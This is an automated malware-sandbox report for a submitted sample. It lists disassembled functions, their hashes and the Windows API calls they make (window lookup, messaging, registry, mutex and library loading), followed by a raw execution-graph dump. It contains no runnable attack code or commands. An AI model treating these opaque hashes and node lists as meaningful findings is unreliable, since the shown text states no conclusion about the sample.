                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Version
                                                                              • String ID:
                                                                              • API String ID: 1889659487-0
                                                                              • Opcode ID: 804cda8d473c4c61bcc63f12479ba9190822d5c554409fc9a119c77cb0a2aa37
                                                                              • Instruction ID: 4c33b40dd65743d8d98a5ffd827b1eb297e5dd4f71424004bfe2d5ab9b26ea54
                                                                              • Opcode Fuzzy Hash: 804cda8d473c4c61bcc63f12479ba9190822d5c554409fc9a119c77cb0a2aa37
                                                                              • Instruction Fuzzy Hash: 00C0126040070186D7109B31DC02B1672D4AB44310F4405396DA4963C2E73C80018A6E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                                              • Instruction ID: 7dc6dc86846b3232beed044054ddb30c9891ac2fec336679fba6e94018ae2b4c
                                                                              • Opcode Fuzzy Hash: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                                              • Instruction Fuzzy Hash: C032D775E00219DFCB14CF99CA80AADB7B2BF88314F24816AD855B7385DB34AE42CF55
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 0040704D
                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
                                                                              • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 004070A1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressCloseHandleModuleProc
                                                                              • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                              • API String ID: 4190037839-2401316094
                                                                              • Opcode ID: 84283e8ecd5f01446eeee6c4ca3ac4597d6d061694d9d4138b3ca6e7d0b19e25
                                                                              • Instruction ID: c068e7fb85b52830e378cef5638f1cf195f9e270113e5aa630163df598a56aa7
                                                                              • Opcode Fuzzy Hash: 84283e8ecd5f01446eeee6c4ca3ac4597d6d061694d9d4138b3ca6e7d0b19e25
                                                                              • Instruction Fuzzy Hash: 72214170E04209ABDB10EAB5CC55A9E77A9EB48304F60847BA510FB3C1D7BCAE01875E
                                                                              APIs
                                                                              • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
                                                                              • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
                                                                              • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
                                                                              • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
                                                                              • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
                                                                              • GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
                                                                              • GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
                                                                              • CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
                                                                              • GetLastError.KERNEL32(000000F5), ref: 00403C1E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                              • String ID:
                                                                              • API String ID: 1694776339-0
                                                                              • Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                              • Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
                                                                              • Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                              • Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D
                                                                              APIs
                                                                              • GetSystemDefaultLCID.KERNEL32(00000000,0040560C,?,?,?,?,00000000,00000000,00000000,?,004065EB,00000000,004065FE), ref: 004053DE
                                                                                • Part of subcall function 0040520C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                                • Part of subcall function 00405258: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040545A,?,?,?,00000000,0040560C), ref: 0040526B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: InfoLocale$DefaultSystem
                                                                              • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                              • API String ID: 1044490935-665933166
                                                                              • Opcode ID: 2becd82198b95216644133442ecc563e5ef80f5327bc31795fb041598c227e39
                                                                              • Instruction ID: cc137df54ae1fcbb63b87987e69a719e9c27c4b31815d0debc5c9b1d2781c89a
                                                                              • Opcode Fuzzy Hash: 2becd82198b95216644133442ecc563e5ef80f5327bc31795fb041598c227e39
                                                                              • Instruction Fuzzy Hash: F8515374B00548ABDB00EBA59891A5F7769DB88304F50D5BBB515BB3C6CA3DCA058F1C
                                                                              APIs
                                                                              • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
                                                                              • LocalFree.KERNEL32(0051A368,00000000,00401AB4), ref: 00401A1B
                                                                              • VirtualFree.KERNEL32(?,00000000,00008000,0051A368,00000000,00401AB4), ref: 00401A3A
                                                                              • LocalFree.KERNEL32(0051B368,?,00000000,00008000,0051A368,00000000,00401AB4), ref: 00401A79
                                                                              • RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
                                                                              • RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                              • String ID:
                                                                              • API String ID: 3782394904-0
                                                                              • Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                              • Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
                                                                              • Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                              • Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D
                                                                              APIs
                                                                              • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
                                                                              • ExitProcess.KERNEL32 ref: 00403DE5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ExitMessageProcess
                                                                              • String ID: Error$Runtime error at 00000000$9@
                                                                              • API String ID: 1220098344-1503883590
                                                                              • Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                              • Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
                                                                              • Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                              • Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
                                                                              • SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
                                                                              • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$AllocString
                                                                              • String ID:
                                                                              • API String ID: 262959230-0
                                                                              • Opcode ID: 759139aa8138bb4f1b890a81a570935fc2f09484a8ccbcda4eb7e9d11bc9ffe5
                                                                              • Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
                                                                              • Opcode Fuzzy Hash: 759139aa8138bb4f1b890a81a570935fc2f09484a8ccbcda4eb7e9d11bc9ffe5
                                                                              • Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(00000000,00409C56), ref: 004030E3
                                                                              • GetCommandLineA.KERNEL32(00000000,00409C56), ref: 004030EE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CommandHandleLineModule
                                                                              • String ID: U1hd.@$`&P
                                                                              • API String ID: 2123368496-819386106
                                                                              • Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                              • Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
                                                                              • Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                              • Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
                                                                              APIs
                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000,004098D0,00000000), ref: 00406E4C
                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,70000000,?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000), ref: 00406EBC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: QueryValue
                                                                              • String ID: )q@
                                                                              • API String ID: 3660427363-2284170586
                                                                              • Opcode ID: 32d2d681139902fa63b50b1e86c1c6042aee641263ad409bd5d16b68eaa8278f
                                                                              • Instruction ID: 22a93fbabe645b78fd14ced98f65bd4bcb22fe3fd6f8222f7fa8e6a3c98f8dfc
                                                                              • Opcode Fuzzy Hash: 32d2d681139902fa63b50b1e86c1c6042aee641263ad409bd5d16b68eaa8278f
                                                                              • Instruction Fuzzy Hash: E6415E31D0021AAFDB21DF95C881BAFB7B8EB04704F56447AE901F7280D738AF108B99
                                                                              APIs
                                                                              • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 004094F7
                                                                              • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409507
                                                                              • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 0040951A
                                                                              • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409524
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLastSleep
                                                                              • String ID:
                                                                              • API String ID: 1458359878-0
                                                                              • Opcode ID: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
                                                                              • Instruction ID: cd4a420f7ace5638a97e0bdb8a1e9fccbb234b9240edd4770f97938e6011a3cc
                                                                              • Opcode Fuzzy Hash: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
                                                                              • Instruction Fuzzy Hash: 16F0967360451477CA35A5AF9D81A5F634DDAD1354B10813BE945F3283C538DD0142A9

                                                                              Execution Graph

                                                                              Execution Coverage:16%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:4.7%
                                                                              Total number of Nodes:2000
                                                                              Total number of Limit Nodes:76
                                                                              execution_graph 49897 40cd00 49898 40cd12 49897->49898 49899 40cd0d 49897->49899 49901 406f48 CloseHandle 49899->49901 49901->49898 57420 4923a8 57421 4923dc 57420->57421 57422 4923de 57421->57422 57423 4923f2 57421->57423 57566 446f9c 32 API calls 57422->57566 57426 49242e 57423->57426 57427 492401 57423->57427 57425 4923e7 Sleep 57484 492429 57425->57484 57432 49246a 57426->57432 57433 49243d 57426->57433 57556 446ff8 57427->57556 57428 403420 4 API calls 57430 49289c 57428->57430 57431 492410 57435 492418 FindWindowA 57431->57435 57438 492479 57432->57438 57439 4924c0 57432->57439 57434 446ff8 32 API calls 57433->57434 57436 49244a 57434->57436 57560 447278 57435->57560 57440 492452 FindWindowA 57436->57440 57567 446f9c 32 API calls 57438->57567 57444 49251c 57439->57444 57445 4924cf 57439->57445 57442 447278 19 API calls 57440->57442 57476 492465 57442->57476 57443 492485 57568 446f9c 32 API calls 57443->57568 57451 492578 57444->57451 57452 49252b 57444->57452 57571 446f9c 32 API calls 57445->57571 57448 492492 57569 446f9c 32 API calls 57448->57569 57449 4924db 57572 446f9c 32 API calls 57449->57572 57462 4925b2 57451->57462 57463 492587 57451->57463 57576 446f9c 32 API calls 57452->57576 57454 49249f 57570 446f9c 32 API calls 57454->57570 57457 4924e8 57573 446f9c 32 API calls 57457->57573 57458 4924aa SendMessageA 57461 447278 19 API calls 57458->57461 57459 492537 57577 446f9c 32 API calls 57459->57577 57461->57476 57474 4925c1 57462->57474 57475 492600 57462->57475 57466 446ff8 32 API calls 57463->57466 57465 4924f5 57574 446f9c 32 API calls 57465->57574 57469 492594 57466->57469 57467 492544 57578 446f9c 32 API calls 57467->57578 57477 49259c RegisterClipboardFormatA 57469->57477 57471 492500 PostMessageA 57575 4470d0 19 API calls 57471->57575 57473 492551 57579 446f9c 32 API calls 57473->57579 57581 446f9c 32 API calls 57474->57581 57485 49260f 57475->57485 57486 492654 57475->57486 57476->57484 57480 447278 19 API calls 57477->57480 57480->57484 57481 49255c SendNotifyMessageA 57580 4470d0 19 API calls 57481->57580 57482 4925cd 57582 446f9c 32 API calls 57482->57582 57484->57428 57584 446f9c 32 API calls 57485->57584 57493 4926a8 57486->57493 57494 492663 57486->57494 57488 4925da 57583 446f9c 32 API calls 57488->57583 57491 49261b 57585 446f9c 32 API calls 57491->57585 57492 4925e5 SendMessageA 57496 447278 19 API calls 57492->57496 57501 49270a 57493->57501 57502 4926b7 57493->57502 57588 446f9c 32 API calls 57494->57588 57496->57476 57498 492628 57586 446f9c 32 API calls 57498->57586 57499 49266f 57589 446f9c 32 API calls 57499->57589 57510 492719 57501->57510 57511 492791 57501->57511 57506 446ff8 32 API calls 57502->57506 57504 492633 PostMessageA 57587 4470d0 19 API calls 57504->57587 57508 4926c4 57506->57508 57507 49267c 57590 446f9c 32 API calls 57507->57590 57512 42e394 2 API calls 57508->57512 57514 446ff8 32 API calls 57510->57514 57521 4927a0 57511->57521 57522 4927c6 57511->57522 57515 4926d1 57512->57515 57513 492687 SendNotifyMessageA 57591 4470d0 19 API calls 57513->57591 57517 492728 57514->57517 57518 4926e7 GetLastError 57515->57518 57519 4926d7 57515->57519 57592 446f9c 32 API calls 57517->57592 57523 447278 19 API calls 57518->57523 57520 447278 19 API calls 57519->57520 57524 4926e5 57520->57524 57597 446f9c 32 API calls 57521->57597 57529 4927f8 57522->57529 57530 4927d5 57522->57530 57523->57524 57528 447278 19 API calls 57524->57528 57527 4927aa FreeLibrary 57598 4470d0 19 API calls 57527->57598 57528->57484 57539 492807 57529->57539 57545 49283b 57529->57545 57533 446ff8 32 API calls 57530->57533 57531 49273b GetProcAddress 57534 492781 57531->57534 57535 492747 57531->57535 57536 4927e1 57533->57536 57596 4470d0 19 API calls 57534->57596 57593 446f9c 32 API calls 57535->57593 57541 4927e9 CreateMutexA 57536->57541 57599 48c764 32 API calls 57539->57599 57540 492753 57594 446f9c 32 API calls 57540->57594 57541->57484 57544 492760 57548 447278 19 API calls 57544->57548 57545->57484 57601 48c764 32 API calls 57545->57601 57547 492813 57550 492824 OemToCharBuffA 57547->57550 57549 492771 57548->57549 57595 4470d0 19 API calls 57549->57595 57600 48c77c 19 API calls 57550->57600 57553 492856 57554 492867 CharToOemBuffA 57553->57554 57602 48c77c 19 API calls 57554->57602 57557 447000 57556->57557 57603 436078 57557->57603 57559 44701f 57559->57431 57561 447280 57560->57561 57626 4363e0 VariantClear 57561->57626 57563 4472a3 57564 4472ba 57563->57564 57627 408c0c 18 API calls 57563->57627 57564->57484 57566->57425 57567->57443 57568->57448 57569->57454 57570->57458 57571->57449 57572->57457 57573->57465 57574->57471 57575->57476 57576->57459 57577->57467 57578->57473 57579->57481 57580->57484 57581->57482 57582->57488 57583->57492 57584->57491 57585->57498 57586->57504 57587->57476 57588->57499 57589->57507 57590->57513 57591->57484 57592->57531 57593->57540 57594->57544 57595->57476 57596->57476 57597->57527 57598->57484 57599->57547 57600->57484 57601->57553 57602->57484 57604 436084 57603->57604 57617 4360a6 57603->57617 57604->57617 57623 408c0c 18 API calls 57604->57623 57605 436129 57625 408c0c 18 API calls 57605->57625 57607 436111 57612 403494 4 API calls 57607->57612 57608 4360f9 57615 403510 18 API calls 57608->57615 57609 4360ed 57614 403510 18 API calls 57609->57614 57610 43611d 57624 4040e8 32 API calls 57610->57624 57616 43611a 57612->57616 57619 4360f6 57614->57619 57621 436102 57615->57621 57616->57559 57617->57605 57617->57607 57617->57608 57617->57609 57617->57610 57622 436105 57617->57622 57618 436126 57618->57559 57619->57559 57620 43613a 57620->57559 57621->57559 57622->57559 57623->57617 57624->57618 57625->57620 57626->57563 57627->57564 49902 46b984 49903 46b9b8 49902->49903 49936 46be21 49902->49936 49905 46b9f4 49903->49905 49908 46ba50 49903->49908 49909 46ba2e 49903->49909 49910 46ba3f 49903->49910 49911 46ba0c 49903->49911 49912 46ba1d 49903->49912 49905->49936 49993 468ae8 49905->49993 50231 46b914 59 API calls 49908->50231 49958 46b544 49909->49958 50230 46b704 81 API calls 49910->50230 50228 46b294 61 API calls 49911->50228 50229 46b3fc 56 API calls 49912->50229 49916 403400 4 API calls 49920 46be68 49916->49920 49919 46ba12 49919->49905 49919->49936 49921 46ba8c 49932 46bacf 49921->49932 49921->49936 50232 494910 49921->50232 49924 46bbf2 50251 483070 137 API calls 49924->50251 49927 46bc0d 49927->49936 49928 42cbc0 20 API calls 49928->49932 49929 46bc4b 50011 469d90 49929->50011 49930 414ae8 18 API calls 49930->49932 49931 403450 18 API calls 49931->49932 49932->49924 49932->49928 49932->49929 49932->49930 49932->49931 49933 46addc 37 API calls 49932->49933 49932->49936 49954 46bd13 49932->49954 49996 468a24 49932->49996 50004 46ab48 49932->50004 50155 482b68 49932->50155 50268 46b050 33 API calls 49932->50268 49933->49932 50269 403400 49936->50269 49937 46addc 37 API calls 49937->49936 49939 46bcb1 50072 403450 49939->50072 49942 46bd1d 49948 46bddf 49942->49948 50078 46addc 49942->50078 49943 46bccd 50252 457d6c 49943->50252 49947 457d6c 38 API calls 49947->49954 49954->49937 50273 46c298 49958->50273 49961 46b6c6 50298 403420 49961->50298 49965 46b592 49991 46b6b2 49965->49991 50280 455f84 27 API calls 49965->50280 49966 403400 4 API calls 49968 46b6e8 49966->49968 49967 403450 18 API calls 49967->49961 49970 403400 4 API calls 49968->49970 49971 46b6f0 49970->49971 49971->49905 49973 46b615 49973->49961 49987 46b675 49973->49987 50290 42cd48 49973->50290 49974 46b5b0 49974->49973 50281 466474 49974->50281 49977 42cd48 21 API calls 49980 46b68b 49977->49980 49985 451458 18 API calls 49980->49985 49980->49991 49981 466474 33 API calls 49983 46b5f0 49981->49983 50285 451428 49983->50285 49988 46b6a2 49985->49988 49987->49961 49987->49977 49987->49991 50297 47eab4 56 API calls 49988->50297 49991->49961 49991->49967 49994 468a24 33 API calls 49993->49994 49995 468af7 49994->49995 49995->49921 49999 468a53 49996->49999 49997 4078f4 33 API calls 49998 468a8c 49997->49998 50618 453344 18 API calls 49998->50618 49999->49997 50001 468a94 49999->50001 50002 403400 4 API calls 50001->50002 50003 468aac 50002->50003 50003->49932 50005 46ab54 50004->50005 50006 46ab59 50004->50006 50007 46ab57 50005->50007 50619 46a5b4 50005->50619 50704 4698f4 60 API calls 50006->50704 50007->49932 50009 46ab61 50009->49932 50012 403400 4 API calls 50011->50012 50013 469dbe 50012->50013 51081 47d7f0 50013->51081 50015 469e21 50016 469e25 50015->50016 50017 469e3e 50015->50017 51088 466674 50016->51088 50019 469e2f 50017->50019 51091 494800 18 API calls 50017->51091 50020 46a0d2 50019->50020 50022 469f5d 50019->50022 50023 469fc8 50019->50023 50024 403420 4 API calls 50020->50024 50027 403494 4 API calls 50022->50027 50028 403494 4 API calls 50023->50028 50029 46a0fc 50024->50029 50025 469e5a 50025->50019 50026 469e62 50025->50026 50030 46addc 37 API calls 50026->50030 50031 469f6a 50027->50031 50032 469fd5 50028->50032 50029->49939 50039 469e6f 50030->50039 50033 40357c 18 API calls 50031->50033 50034 40357c 18 API calls 50032->50034 50035 469f77 50033->50035 50036 469fe2 50034->50036 50037 40357c 18 API calls 50035->50037 50038 40357c 18 API calls 50036->50038 50040 469f84 50037->50040 50041 469fef 50038->50041 50044 469eb0 50039->50044 50045 469e98 SetActiveWindow 50039->50045 50042 40357c 18 API calls 50040->50042 50043 40357c 18 API calls 50041->50043 50046 469f91 50042->50046 50047 469ffc 50043->50047 51092 42f560 50044->51092 50045->50044 50049 466674 34 API calls 50046->50049 50048 40357c 18 API calls 50047->50048 50051 46a00a 50048->50051 50050 469f9f 50049->50050 50052 40357c 18 API calls 50050->50052 50053 414b18 18 API calls 50051->50053 50055 469fa8 50052->50055 50056 469fc6 50053->50056 50058 40357c 18 API calls 50055->50058 51109 4669ac 50056->51109 50061 469fb5 50058->50061 50063 414b18 18 API calls 50061->50063 50062 469f01 50064 46ac58 35 API calls 50062->50064 50063->50056 50065 469f33 50064->50065 50065->49939 50074 403454 50072->50074 50076 403464 50072->50076 50073 403490 50073->49942 50073->49943 50075 4034bc 18 API calls 50074->50075 50074->50076 50075->50076 50076->50073 50077 402660 4 API calls 50076->50077 50077->50073 50079 468ae8 33 API calls 50078->50079 50080 46adf4 50079->50080 50081 46ae16 50080->50081 50082 465140 21 API calls 50080->50082 51305 465140 50081->51305 50082->50081 50086 46ae2e 50087 46ac58 35 API calls 50086->50087 50088 46ae66 50087->50088 50089 414b18 18 API calls 50088->50089 50090 46ae7a 50089->50090 50091 46ae86 50090->50091 50092 46aeb0 50090->50092 50093 414b18 18 API calls 50091->50093 50095 46aecf 50092->50095 50096 46aef9 50092->50096 50094 46ae9a 50093->50094 50098 414b18 18 API calls 50094->50098 50099 414b18 18 API calls 50095->50099 50097 414b18 18 API calls 50096->50097 50100 46af0d 50097->50100 50101 46aeae 50098->50101 50102 46aee3 50099->50102 50103 414b18 18 API calls 50100->50103 51322 46ab70 50101->51322 50104 414b18 18 API calls 50102->50104 50103->50101 50104->50101 50156 46c298 62 API calls 50155->50156 50157 482bab 50156->50157 50158 482bb4 50157->50158 51588 408be0 19 API calls 50157->51588 50160 414ae8 18 API calls 50158->50160 50161 482bc4 50160->50161 50162 403450 18 API calls 50161->50162 50163 482bd1 50162->50163 51390 46c5f0 50163->51390 50166 482be1 50168 414ae8 18 API calls 50166->50168 50169 482bf1 50168->50169 50170 403450 18 API calls 50169->50170 50171 482bfe 50170->50171 50172 4696dc SendMessageA 